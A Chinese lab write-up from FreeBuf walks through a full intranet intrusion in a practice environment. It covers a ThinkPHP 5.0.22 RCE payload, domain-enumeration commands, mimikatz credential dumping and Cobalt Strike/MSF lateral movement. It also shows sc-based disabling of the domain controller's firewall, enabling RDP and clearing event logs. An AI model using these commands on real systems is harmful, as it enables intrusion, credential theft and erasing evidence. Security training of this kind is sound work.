一. 环境信息
Win7 +phpstudy+thinkphp(5.0.22)
ip:192.168.1.101
ip:192.168.138.136
Win2008
ip:192.168.138.138
kali
ip:192.168.1.128
二. WEB渗透
访问网页,发现网站是ThinkPHP5
![1655863865_62b27a392282ac8b40d36.png!small?1655863865439](https://image.3001.net/images/20220622/1655863865_62b27a392282ac8b40d36.png!small?1655863865439)
2.1 目录扫描
可以看到存在后面add.php,但没有密码
![1655863875_62b27a43a9d4649754f1a.png!small?1655863875988](https://image.3001.net/images/20220622/1655863875_62b27a43a9d4649754f1a.png!small?1655863875988)
输入错误页面发现版本号
![1655863884_62b27a4cd2d8ef4dc0083.png!small?1655863885308](https://image.3001.net/images/20220622/1655863884_62b27a4cd2d8ef4dc0083.png!small?1655863885308)
2.2 ThinkPHP V5.0.22 RCE
index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
这里我读了一下刚才发现的add.php
![1655863894_62b27a562499599968eb0.png!small?1655863906214](https://image.3001.net/images/20220622/1655863894_62b27a562499599968eb0.png!small?1655863906214)
密码解密是admins
![1655863903_62b27a5fd9723dd909548.png!small?1655863906212](https://image.3001.net/images/20220622/1655863903_62b27a5fd9723dd909548.png!small?1655863906212)
这里我主要是想玩一下这个大马,其实也可以自己写一个一句话
三. 后渗透
ipconfig /all # 查看本机ip,所在域
route print # 打印路由信息
net view # 查看局域网内其他主机名
arp -a # 查看arp缓存
net start # 查看开启了哪些服务
net share # 查看开启了哪些共享
net share ipc$ # 开启ipc共享
net share c$ # 开启c盘共享
net use \\192.168.xx.xx\ipc$ “” /user:”” # 与192.168.xx.xx建立空连接
net use \\192.168.xx.xx\c$ “密码” /user:”用户名” # 建立c盘共享
dir \\192.168.xx.xx\c$\user # 查看192.168.xx.xx c盘user目录下的文件
net config Workstation # 查看计算机名、全名、用户名、系统版本、工作站、域、登录域
net user # 查看本机用户列表
net user /domain # 查看域用户
net localgroup administrators # 查看本地管理员组(通常会有域用户)
net view /domain # 查看有几个域
net user 用户名 /domain # 获取指定域用户的信息
net group /domain # 查看域里面的工作组,查看把用户分了多少组(只能在域控上操作)
net group 组名 /domain # 查看域中某工作组
net time /domain // 主域服务器会同时作为时间服务器
net group “domain admins” /domain # 查看域管理员的名字
net group “domain computers” /domain # 查看域中的其他主机名
net group “doamin controllers” /domain # 查看域控制器(可能有多台)
net group “Enterprise Admins” /domain // 查看域管理员组
3.1 信息收集
查看arp信息
![1655863920_62b27a709abd59489a42c.png!small?1655863921081](https://image.3001.net/images/20220622/1655863920_62b27a709abd59489a42c.png!small?1655863921081)
![1655863929_62b27a794b287e5df1072.png!small?1655863929683](https://image.3001.net/images/20220622/1655863929_62b27a794b287e5df1072.png!small?1655863929683)
可以看到域名sun.com,尝试ping一下
![1655863948_62b27a8c7df549160a258.png!small?1655863948994](https://image.3001.net/images/20220622/1655863948_62b27a8c7df549160a258.png!small?1655863948994)
3.2 利用CS
上传后门
![1655863960_62b27a9845f45e1058c2b.png!small?1655863960761](https://image.3001.net/images/20220622/1655863960_62b27a9845f45e1058c2b.png!small?1655863960761)
执行上线
![1655863967_62b27a9fa2c8c8ef57ae4.png!small?1655863967984](https://image.3001.net/images/20220622/1655863967_62b27a9fa2c8c8ef57ae4.png!small?1655863967984)
提权
![1655863975_62b27aa7f0adf5fb233c0.png!small?1655863976284](https://image.3001.net/images/20220622/1655863975_62b27aa7f0adf5fb233c0.png!small?1655863976284)
![1655863989_62b27ab59070906a81d51.png!small?1655863990085](https://image.3001.net/images/20220622/1655863989_62b27ab59070906a81d51.png!small?1655863990085)
使用mimikatz读取administrator和leo的密码
![1655864001_62b27ac153fdd7d9d2fed.png!small?1655864001804](https://image.3001.net/images/20220622/1655864001_62b27ac153fdd7d9d2fed.png!small?1655864001804)
![1655864009_62b27ac9aa67208a74731.png!small?1655864010065](https://image.3001.net/images/20220622/1655864009_62b27ac9aa67208a74731.png!small?1655864010065)
得到凭证后可以用psexec登陆主机,需要开放445端口ipc
3.3 内网扫描
Portscan 网段 端口 协议(icmp arp none)线程
![1655864017_62b27ad1d6bc27d18a6a6.png!small?1655864018365](https://image.3001.net/images/20220622/1655864017_62b27ad1d6bc27d18a6a6.png!small?1655864018365)
找到目标DC
![1655864025_62b27ad91037b552c996e.png!small?1655864025457](https://image.3001.net/images/20220622/1655864025_62b27ad91037b552c996e.png!small?1655864025457)
这里存在防火墙,阻止了端口流量的进出,所以创建一个smb的监听
![1655864031_62b27adfbe7713cdd00ff.png!small?1655864032272](https://image.3001.net/images/20220622/1655864031_62b27adfbe7713cdd00ff.png!small?1655864032272)
之后使用psexec64进行横向移动
DC成功上线
![1655864038_62b27ae69f5e81ac606c5.png!small?1655864039210](https://image.3001.net/images/20220622/1655864038_62b27ae69f5e81ac606c5.png!small?1655864039210)
还获取到admin的密码
![1655864045_62b27aed5fdded1a2a556.png!small?1655864046224](https://image.3001.net/images/20220622/1655864045_62b27aed5fdded1a2a556.png!small?1655864046224)
3.4 利用MSF
生成监听
![1655864052_62b27af4b563742921d78.png!small?1655864053162](https://image.3001.net/images/20220622/1655864052_62b27af4b563742921d78.png!small?1655864053162)
上传并执行成功上线MSF
![1655864061_62b27afd2894763cd41b4.png!small?1655864061474](https://image.3001.net/images/20220622/1655864061_62b27afd2894763cd41b4.png!small?1655864061474)
提权到SYSTEM
![1655864097_62b27b21803deba0cca4c.png!small?1655864098018](https://image.3001.net/images/20220622/1655864097_62b27b21803deba0cca4c.png!small?1655864098018)
内网ARP扫描
![1655864107_62b27b2b9405173a985b1.png!small?1655864108057](https://image.3001.net/images/20220622/1655864107_62b27b2b9405173a985b1.png!small?1655864108057)
建立内网路由
![1655864115_62b27b33d6be84653913a.png!small?1655864116185](https://image.3001.net/images/20220622/1655864115_62b27b33d6be84653913a.png!small?1655864116185)
开启代理7777端口
![1655864122_62b27b3a46bac1c7a28c0.png!small?1655864122550](https://image.3001.net/images/20220622/1655864122_62b27b3a46bac1c7a28c0.png!small?1655864122550)
kiwi获取密码凭证
![1655864130_62b27b427996190e026ac.png!small?1655864131015](https://image.3001.net/images/20220622/1655864130_62b27b427996190e026ac.png!small?1655864131015)
这里直接利用psexec发现执行不成功,考虑是防火墙的原因
3.5 ipc连接关闭域控防火墙
这里的常规方法是使用netsh关闭域控防火墙,但是这里需要域控的管理员权限,所以在这里我们就直接使用ipc连接域控然后使用计划任务添加规则关闭防火墙
netsh advfirewall firewall add rule name=”f.exe” dir=in program=”e:\f.exe” action=allow
netsh advfirewall firewall delete rule name=”f.exe”
域控建立ipc连接
net use \\192.168.138.138\ipc$ dc123.com /user:administrator
![1655864143_62b27b4f23c4974aab340.png!small?1655864143398](https://image.3001.net/images/20220622/1655864143_62b27b4f23c4974aab340.png!small?1655864143398)
利用sc创建计划任务立即启动关闭域控的防火墙
sc \\192.168.138.138 create unablefirewall binpath= “netsh advfirewall set allprofiles state off” # 创建服务
sc \\192.168.138.138 start unablefirewall # 立即启动服务
![1655864154_62b27b5a649a6a0b876e2.png!small?1655864154671](https://image.3001.net/images/20220622/1655864154_62b27b5a649a6a0b876e2.png!small?1655864154671)
这里不知道什么原因显示失败,但确实执行成功,关闭了防火墙
由于DC不出网,这里创建一个正向的监听
![1655864162_62b27b626cea0ebd1ded6.png!small?1655864162870](https://image.3001.net/images/20220622/1655864162_62b27b626cea0ebd1ded6.png!small?1655864162870)
再次psexec成功上线
![1655864169_62b27b6937a34917612e2.png!small?1655864169681](https://image.3001.net/images/20220622/1655864169_62b27b6937a34917612e2.png!small?1655864169681)
拿到admin的密码
![1655864178_62b27b72d832db488c141.png!small?1655864179465](https://image.3001.net/images/20220622/1655864178_62b27b72d832db488c141.png!small?1655864179465)
挂上代理尝试远程登录
3.6 远程登录
开启3389
run post/windows/manage/enable_rdp
![1655864187_62b27b7bab4aae28dc1ad.png!small?1655864188213](https://image.3001.net/images/20220622/1655864187_62b27b7bab4aae28dc1ad.png!small?1655864188213)
windows远程登录
![1655864195_62b27b83c6935f886d414.png!small?1655864196065](https://image.3001.net/images/20220622/1655864195_62b27b83c6935f886d414.png!small?1655864196065)
3.7 日志清除
msf自带
run event_manager -i
run event_manager -c
![1655864206_62b27b8e92b9bf16c590e.png!small?1655864207192](https://image.3001.net/images/20220622/1655864206_62b27b8e92b9bf16c590e.png!small?1655864207192)
服务器管理器清除
![1655864214_62b27b9685d8aad96462f.png!small?1655864215337](https://image.3001.net/images/20220622/1655864214_62b27b9685d8aad96462f.png!small?1655864215337)
本文作者:山石网科, 转载请注明来自FreeBuf.COM
请登录后查看评论内容